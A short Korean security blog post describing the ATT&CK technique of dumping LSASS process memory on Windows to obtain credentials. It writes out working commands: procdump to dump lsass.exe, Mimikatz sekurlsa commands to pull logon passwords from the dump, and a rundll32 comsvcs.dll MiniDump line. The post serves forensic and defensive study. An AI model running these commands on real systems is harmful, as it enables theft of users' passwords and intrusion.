Notice
Recent Posts
Recent Comments
Link
일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | 5 | 6 | 7 |
8 | 9 | 10 | 11 | 12 | 13 | 14 |
15 | 16 | 17 | 18 | 19 | 20 | 21 |
22 | 23 | 24 | 25 | 26 | 27 | 28 |
29 | 30 |
Tags
- 정보보안
- elasticsearch
- 랜섬웨어
- SQLMap
- sql인젝션
- forensic
- Index
- Credential Access
- AD
- 침해사고
- rce
- #whitespace #
- node.js
- Mitre
- Threat Intelligence
- 시스템해킹
- wargame
- 가이드라인
- software
- filesystem
- pwnable
- exploit
- 백엔드개발자
- elk stack
- PetitPotam
- error 583066
- 프론트엔드개발자
- #C언어 #연산자
- windows
- ATT&CK
Archives
- Today
- Total
Plit00's Story
[Windows] - LSASS Memory Dump 본문
OS Credential Dumping: LSASS Memory
프로세스의 메모리 공간에 저장되는 도메인, 로컬 사용자 이름 및 비밀번호를 LSASS라고 한다.
사용자가 Logon 후 시스템은 LSASS 프로세스 메모리에 자격 증명 자료를 생성하고 저장한다.
이는 LSASS 프로세스 메모리를 특정 호스트에서 덤프하고 로컬 시스템에서 분석이 가능하다.
EX) 특정 호스트
procdump -ma lsass.exe lsass.dmp
procdump를 이용하여 lsass.exe를 dmp 덤프를 한다. 그 후 로컬로 파일을 옮기면된다.
Lsass 메모리 덤프 파일을 분석 하기위해서 필요한 도구는 Mimikatz이다.
> sekurlsa::Minidump lsass.dmp
> sekurlsa::logonPasswords
comsvcs.dll(멀웨어가 주로 사용한다)을 이용해서도 할 수 있다.
rundll32.exe는 dll 파일을 다른 응용프로그램에서도 실행할 수 있도록 하는 프로그램이다.
> rundll32.exe C:\Windows\System32\comsvcs.dll Minidump (PID) lsass.dmp full
'Security > Forensic' 카테고리의 다른 글
[Mac OS] - Architecture (1) | 2023.02.06 |
---|---|
[Windows Artifact] - Shortcut(.*LNK) (0) | 2023.02.05 |
[Windows] - Authentication Structure(lsass.exe) (0) | 2022.05.15 |
[Windows] - Access Token(2) (0) | 2022.05.15 |
[Windows] - Access Token(1) (0) | 2022.05.15 |
Comments